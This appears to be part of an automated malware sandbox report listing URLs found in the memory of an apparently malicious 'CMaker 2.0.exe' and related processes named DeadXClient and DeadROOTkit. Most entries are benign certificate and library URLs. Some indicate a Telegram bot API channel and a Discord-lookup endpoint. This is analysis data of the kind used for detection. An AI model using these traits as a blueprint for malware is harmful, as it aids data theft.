                        Source: CMaker 2.0.exe, 00000002.00000003.2159236545.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2158330808.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2154111346.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2153941458.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2153763933.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2157716740.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2160330876.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2158524177.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2153367704.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2154831526.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2154539610.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2153633513.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2158096042.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2154348127.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2158194630.00000218C0180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                        Source: lsass.exe, 00000014.00000002.3484911785.000002D6F0DCD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000003.2641805218.000002D6F0DD3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000000.2327594784.000002D6F0DD9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com1.3.6.1.5.5.7.48.2http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.c
                        Source: powershell.exe, 00000009.00000002.2322203406.000001DE6485D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                        Source: CMaker 2.0.exe, 00000005.00000003.2220128984.0000022D35221000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2226910448.0000022D352A9000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2225314134.0000022D35274000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2227278021.0000022D352AA000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2228213204.0000022D352A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://repository.swisssign.com/
                        Source: lsass.exe, 00000014.00000000.2323081160.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000002.3471000801.000002D6F062F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
                        Source: lsass.exe, 00000014.00000000.2323081160.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000002.3471000801.000002D6F062F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
                        Source: DeadXClient.exe, 00000006.00000002.3473575665.0000000002DE1000.00000004.00000800.00020000.00000000.sdmp, DeadROOTkit.exe, 00000007.00000002.2316235027.00000000030DA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2322203406.000001DE64631000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                        Source: lsass.exe, 00000014.00000000.2323081160.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000000.2323129454.000002D6F064E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000002.3471000801.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000002.3471566712.000002D6F064E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/07/securitypolicy
                        Source: lsass.exe, 00000014.00000000.2323081160.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000002.3471000801.000002D6F062F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                        Source: lsass.exe, 00000014.00000000.2323081160.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000002.3471000801.000002D6F062F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/erties
                        Source: lsass.exe, 00000014.00000000.2323081160.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000002.3471000801.000002D6F062F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap12/
                        Source: lsass.exe, 00000014.00000000.2323081160.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000002.3471000801.000002D6F062F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap12/P
                        Source: CMaker 2.0.exe, 00000005.00000002.2260123822.0000022D35540000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://tools.ietf.org/html/rfc6125#section-6.4.3
                        Source: CMaker 2.0.exe, 00000005.00000003.2229209676.0000022D34CA0000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2226376831.0000022D352E3000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2238078413.0000022D34CD1000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2220128984.0000022D35221000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2225808722.0000022D352C9000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2234701009.0000022D34CD0000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2230284618.0000022D34CA1000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000002.2259547201.0000022D352E6000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2244950158.0000022D34CD1000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000002.2257114555.0000022D34CD1000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2225314134.0000022D35274000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2227398633.0000022D352E6000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2228810788.0000022D34C9B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0
                        Source: CMaker 2.0.exe, 00000005.00000003.2220128984.0000022D35221000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2225808722.0000022D352C9000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2225314134.0000022D35274000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl
                        Source: CMaker 2.0.exe, 00000005.00000003.2226376831.0000022D352E3000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2220128984.0000022D35221000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2225808722.0000022D352C9000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000002.2259547201.0000022D352E6000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2225314134.0000022D35274000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2227398633.0000022D352E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl0
                        Source: CMaker 2.0.exe, 00000005.00000003.2220128984.0000022D35221000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2225808722.0000022D352C9000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2245266079.0000022D352CF000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2225314134.0000022D35274000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000002.2259518979.0000022D352CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/legislacion_c.htm
                        Source: CMaker 2.0.exe, 00000005.00000003.2226376831.0000022D352E3000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2220128984.0000022D35221000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2225808722.0000022D352C9000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000002.2259547201.0000022D352E6000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2225314134.0000022D35274000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2227398633.0000022D352E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/legislacion_c.htm0U
                        Source: CMaker 2.0.exe, 00000005.00000003.2226376831.0000022D352E3000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2220128984.0000022D35221000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2225808722.0000022D352C9000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2245266079.0000022D352CF000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000002.2259547201.0000022D352E6000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2225314134.0000022D35274000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2227398633.0000022D352E6000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000002.2259518979.0000022D352CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es00
                        Source: powershell.exe, 00000009.00000002.2322203406.000001DE6485D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                        Source: CMaker 2.0.exe, 00000005.00000003.2227719395.0000022D35311000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cert.fnmt.es/dpcs/
                        Source: CMaker 2.0.exe, 00000005.00000003.2172704229.0000022D34E09000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2172153148.0000022D34E04000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2171930276.0000022D34CDD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cl.cam.ac.uk/~mgk25/iso-time.html
                        Source: CMaker 2.0.exe, 00000002.00000003.2159236545.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2158330808.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2154111346.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2153941458.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2153763933.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2157716740.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2160330876.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2158524177.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2153367704.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2154831526.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2154539610.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2153633513.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2158096042.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2154348127.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2158194630.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, lsass.exe, 00000014.00000002.3484275684.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000003.2631692516.000002D6F0D72000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000003.2641944751.000002D6F0CEB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000002.3472734902.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000002.3482576500.000002D6F0D9A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000000.2327539653.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
                        Source: CMaker 2.0.exe, 00000005.00000002.2256390299.0000022D34A4C000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2244995687.0000022D34A4B000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2229615812.0000022D34CFC000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2234727388.0000022D34CFC000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2217334699.0000022D34CFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.firmaprofesional.com/cps0
                        Source: CMaker 2.0.exe, 00000005.00000003.2231786991.0000022D34C9B000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2236418298.0000022D34C9E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2175447442.0000022D34C9B000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2235158831.0000022D34C9C000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2231226185.0000022D34C9B000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2228810788.0000022D34C9B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6
                        Source: CMaker 2.0.exe, 00000005.00000003.2172704229.0000022D34E09000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2172194945.0000022D34A94000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2172153148.0000022D34E04000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iana.org/time-zones/repository/tz-link.html
                        Source: CMaker 2.0.exe, 00000005.00000003.2172704229.0000022D34E09000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2172153148.0000022D34E04000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2171930276.0000022D34CDD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.phys.uu.nl/~vgent/calendar/isocalendar.htm
                        Source: CMaker 2.0.exe, 00000005.00000003.2232058753.0000022D3527F000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2242336196.0000022D35282000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2220128984.0000022D35221000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2225314134.0000022D35274000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2245417643.0000022D35282000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2246505041.0000022D35296000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadisglobal.com/cps
                        Source: CMaker 2.0.exe, 00000005.00000003.2232058753.0000022D3527F000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2242336196.0000022D35282000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2220128984.0000022D35221000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2225314134.0000022D35274000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2245417643.0000022D35282000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2246505041.0000022D35296000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadisglobal.com/cps.=
                        Source: CMaker 2.0.exe, 00000005.00000003.2220128984.0000022D35221000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2226910448.0000022D352A9000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2225314134.0000022D35274000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2227278021.0000022D352AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadisglobal.com/cps0
                        Source: CMaker 2.0.exe, 00000005.00000003.2228708764.0000022D34E16000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2233681929.0000022D34E16000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2228000312.0000022D34E16000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2235010705.0000022D34E20000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2176753865.0000022D34E1B000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2222507577.0000022D34E16000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2177316292.0000022D34E16000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2177316292.0000022D34CFC000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2232397966.0000022D34E16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wwwsearch.sf.net/):
                        Source: powershell.exe, 00000009.00000002.2322203406.000001DE64631000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                        Source: 1.exe, 00000004.00000002.2208653873.0000000002FE1000.00000004.00000800.00020000.00000000.sdmp, DeadROOTkit.exe, 00000007.00000000.2203959868.0000000000DD2000.00000002.00000001.01000000.0000001B.sdmpString found in binary or memory: https://api.telegram.org/bot
                        Source: powershell.exe, 00000009.00000002.2359290982.000001DE7469F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                        Source: powershell.exe, 00000009.00000002.2359290982.000001DE7469F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                        Source: powershell.exe, 00000009.00000002.2359290982.000001DE7469F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                        Source: CMaker 2.0.exe, 00000002.00000003.2156737059.00000218C0180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cryptography.io
                        Source: CMaker 2.0.exe, 00000002.00000003.2156737059.00000218C0180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cryptography.io/
                        Source: CMaker 2.0.exe, 00000002.00000003.2156737059.00000218C0180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cryptography.io/en/latest/changelog/
                        Source: CMaker 2.0.exe, 00000002.00000003.2156737059.00000218C0180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cryptography.io/en/latest/installation/
                        Source: CMaker 2.0.exe, 00000002.00000003.2156737059.00000218C0180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cryptography.io/en/latest/security/
                        Source: CMaker 2.0.exe, 00000005.00000002.2256204504.0000022D34840000.00000004.00001000.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000002.2260388566.0000022D35834000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://dashboard.botghost.com/api/public/tools/user_lookup/1077300934692049067
                        Source: CMaker 2.0.exe, 00000005.00000002.2260388566.0000022D35834000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://dashboard.botghost.com/api/public/tools/user_lookup/10773009346920490670D
                        Source: CMaker 2.0.exe, 00000005.00000002.2256204504.0000022D34840000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://dashboard.botghost.com/api/public/tools/user_lookup/10773009346920490670Y
                        Source: CMaker 2.0.exe, 00000005.00000003.2172273654.0000022D34DCB000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2231869727.0000022D34DB4000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2171930276.0000022D34DCB000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2172905632.0000022D34DCB000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2222507577.0000022D34DB4000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000002.2257514118.0000022D34DEC000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2177316292.0000022D34DB4000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2176753865.0000022D34DB4000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2175839153.0000022D34DB4000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2229086639.0000022D34DB4000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2243720980.0000022D34DE4000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2243030617.0000022D34DCA000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2232613398.0000022D34DBE000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2237820216.0000022D34DC3000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2232547754.0000022D34DB4000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2226687778.0000022D34DB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64
                        Source: CMaker 2.0.exe, 00000005.00000003.2176043917.0000022D34D3E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2175447442.0000022D34D3E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000002.2257904597.0000022D34F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://foss.heptapod.net/pypy/pypy/-/issues/3539
                        Source: CMaker 2.0.exe, 00000005.00000003.2225418813.0000022D35112000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2232092321.0000022D3512C000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2230552371.0000022D3512A000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2229249581.0000022D35113000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2176104183.0000022D3514D000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2236511528.0000022D35151000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Ousret/charset_normalizer
                        Source: powershell.exe, 00000009.00000002.2322203406.000001DE6485D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                        Source: CMaker 2.0.exe, 00000005.00000003.2231837202.0000022D32CFB000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2231595262.0000022D32CDB000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2166652116.0000022D34A41000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2229517767.0000022D32CAD000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000002.2256023136.0000022D32D03000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2168838865.0000022D32CDD000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2231466391.0000022D32CBE000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2228604292.0000022D32CA8000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2168404462.0000022D32CF5000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2230940040.0000022D32CBB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy
                        Source: CMaker 2.0.exe, 00000005.00000002.2260232738.0000022D3568C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/psf/requests/pull/6710
                        Source: CMaker 2.0.exe, 00000002.00000003.2156737059.00000218C0180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/pyca/cryptography
                        Source: CMaker 2.0.exe, 00000002.00000003.2156737059.00000218C0180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/pyca/cryptography/
                        Source: CMaker 2.0.exe, 00000002.00000003.2156737059.00000218C0180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/pyca/cryptography/actions?query=workflow%3ACI
                        Source: CMaker 2.0.exe, 00000002.00000003.2156737059.00000218C0180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/pyca/cryptography/issues
                        Source: CMaker 2.0.exe, 00000002.00000003.2156737059.00000218C0180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/pyca/cryptography/workflows/CI/badge.svg?branch=main
                        Source: CMaker 2.0.exe, 00000005.00000003.2166652116.0000022D34A41000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000002.2256074496.0000022D34688000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688
                        Source: CMaker 2.0.exe, 00000005.00000003.2230940040.0000022D32CBB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py
                        Source: CMaker 2.0.exe, 00000005.00000003.2231837202.0000022D32CFB000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2231595262.0000022D32CDB000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2166652116.0000022D34A41000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2229517767.0000022D32CAD000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000002.2256023136.0000022D32D03000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2168838865.0000022D32CDD000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2231466391.0000022D32CBE000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2228604292.0000022D32CA8000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2168404462.0000022D32CF5000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2230940040.0000022D32CBB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader
                        Source: CMaker 2.0.exe, 00000005.00000003.2170943791.0000022D34AD9000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2170622659.0000022D34D5E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2246985261.0000022D34AC2000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2172194945.0000022D34A94000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000002.2256607534.0000022D34AC2000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2236343248.0000022D34ABF000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2234194053.0000022D34AB7000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2225465109.0000022D34AB6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/issues/86361.
